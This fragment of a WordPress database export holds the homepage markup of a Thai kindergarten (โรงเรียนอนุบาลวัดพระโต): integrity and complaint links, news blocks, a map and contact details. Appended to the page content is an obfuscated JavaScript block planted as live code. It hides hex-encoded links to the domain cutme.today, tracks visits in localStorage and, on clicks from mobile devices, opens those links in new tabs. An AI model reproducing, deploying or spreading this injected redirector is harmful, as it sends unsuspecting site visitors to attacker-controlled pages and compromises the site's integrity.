{\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 14:26:27','2024-08-29 07:26:27','',19,'http://watprato.ssk.in.th/?p=271',0,'revision','',0),
(272,2,'2024-08-29 14:29:12','2024-08-29 07:29:12','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" 